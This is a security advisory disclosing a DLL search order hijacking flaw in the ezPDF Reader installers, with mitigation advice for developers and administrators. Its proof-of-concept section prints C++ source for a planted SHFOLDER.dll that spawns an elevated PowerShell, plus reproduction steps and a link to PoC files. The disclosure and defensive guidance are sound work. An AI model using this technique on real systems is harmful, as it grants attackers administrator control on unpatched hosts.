RSI-2026-0001

Intelligence Summary

Security Advisory: DLL Search Order Hijacking in Unidocs ezPDF Reader and ezPDF DRM Reader

VULNERABILITY ADVISORY - DLL SEARCH ORDER HIJACKING IN EZPDF READER INSTALLERS DATE January 26, 2026 VULNERABILITY SUMMARY A Local Privilege Escalation (LPE) vulnerability exists in the installers for Unidocs ezPDF Reader and ezPDF DRM Reader. The issue stems from the application's failure to use secure, absolute paths when loading essential system libraries. By exploiting the default Windows DLL search order, a local attacker with standard user privileges can execute malicious code with administrative authority. AFFECTED SOFTWARE ezPDF DRM Reader v3.0.0.4 and below (ezPDF_DRM_Reader_3.0.0.4.exe) ezPDF Reader v2.0 and below (ezPDFReader_setup.exe) VULNERABILITY CLASSIFICATION Type: DLL Search Order Hijacking CWE: CWE-427 Uncontrolled Search Path Element Severity: High (7.3) CVSS v3.1: AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H TECHNICAL ANALYSIS The installers are 32-bit executables that attempt to load SHFOLDER.dll. Instead of calling the library from the protected System32 directory, the executable searches the Current Working Directory (CWD) first. If the installer is run from a location where a user can write files—most commonly the Downloads folder—the application will prioritize and load a malicious SHFOLDER.dll placed there by an attacker. Because the installer requires administrative consent (UAC) to run, any code embedded in the hijacked DLL is executed with High Mandatory Level integrity, granting the attacker full control over the host system. PROOF OF CONCEPT The vulnerability was verified on Windows 11 using a custom x86 DLL. The payload utilizes the DllMain entry point to spawn an elevated PowerShell instance. Payload Code (SHFOLDER.cpp): #include <windows.h> DWORD WINAPI Payload(LPVOID lpParam) { WinExec("powershell.exe -NoExit -Command "whoami /priv"", SW_SHOW); return 0; } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { if (ul_reason_for_call == DLL_PROCESS_ATTACH) { CreateThread(NULL, 0, Payload, NULL, 0, NULL); } return TRUE; } REPRODUCTION STEPS Place a compiled SHFOLDER.dll (x86) into a folder. Place the ezPDF installer into the same folder. Execute the installer and accept the UAC prompt. Confirm the payload execution via the resulting elevated PowerShell window. IMPACT An attacker can bypass standard security boundaries to gain administrative access, install persistent malware, or access sensitive system data. This is particularly dangerous in shared environments or on systems where users frequently download and run third-party installers. MITIGATION RECOMMENDATIONS For Developers: Use fully qualified paths for all LoadLibrary calls (e.g., C:\Windows\System32\SHFOLDER.dll). Implement SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32) at the start of the program. Use LoadLibraryEx with the LOAD_LIBRARY_SEARCH_SYSTEM32 flag to ignore the current working directory. For System Administrators: Restrict users from running executable files directly from world-writable directories. Implement Application Control policies to block unsigned or unauthorized DLLs. STATUS The vendor was contacted multiple times prior to this advisory but has not acknowledged the report. No official patch is currently available. RESOURCES Microsoft Security Guidance: https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order PoC Assets: https://gofile.me/7bU54/ZG47Lh7Yx (Password: ezpdfvulnerability) CREDITS Dongwoo Lee (RoyalSnek)